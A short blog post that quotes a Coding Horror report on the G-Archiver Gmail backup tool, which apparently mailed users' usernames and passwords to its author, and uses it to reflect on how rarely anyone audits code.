Trusted code

Coding Horror: A Question of Programming Ethics:

I was looking for a way to back up my gmail account to a local drive. I’ve accumulated a mass of important information that I would rather not lose. During my search I came across G-Archiver, I figured what the heck I’ll give it a try. It didn’t really have the functionality I was looking for, but being a programmer myself I used Reflector to take a peek at the source code. What I came across was quite shocking. John Terry, the apparent creator, hard coded his username and password to his gmail account in source code. All right, not the smartest thing in the world to do, but then I noticed that every time a user adds their account to the program to back up their data, it sends and email with their username and password to his personal email box! Having just entered my own information I became concerned.

And you can almost believe the programmer’s claim that he put iin in for debugging and then forgot to take it out…

This makes me think a little bit about the supposed reproducibility of scientific experiments — it’s supposed to be a cornerstone of scientific method and a guarantee against serious fraud, but how many people do it? Similarly, how many people actually look at the code of some open-source project? They just assume that someone else somewhere is looking at it and auditing it for badness.


Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: